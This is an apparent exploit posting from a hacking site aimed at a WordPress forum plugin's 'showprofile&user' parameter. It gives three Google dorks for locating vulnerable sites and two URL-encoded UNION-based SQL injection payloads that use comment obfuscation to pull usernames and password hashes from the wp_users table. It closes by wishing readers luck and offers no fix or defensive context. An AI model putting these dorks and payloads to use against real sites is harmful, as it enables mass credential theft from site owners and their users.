######################################################################### #
# WordPress forumaction(PAGE_İD)(user)SQL Injection # ######################################################################### # # AUTHOR : [EMAIL PROTECTED] # # HOME : http://www.hackturkiye.com/ # ######################################################################### # # DORK 1 : allinurl: forumaction "showprofile" # DORK 2 : allinurl: page_id user "showprofile" DORK 3 : allinurl:"forum/?forumaction" ########################################################################## # # showprofile&user=SQL Injection(EXPLOİT) # ########################################################################### EXPLOİT 1 showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users EXPLOİT 2 showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users ########################################################################## # [EMAIL PROTECTED] GOOD LUCKY [EMAIL PROTECTED] ##########################################################################
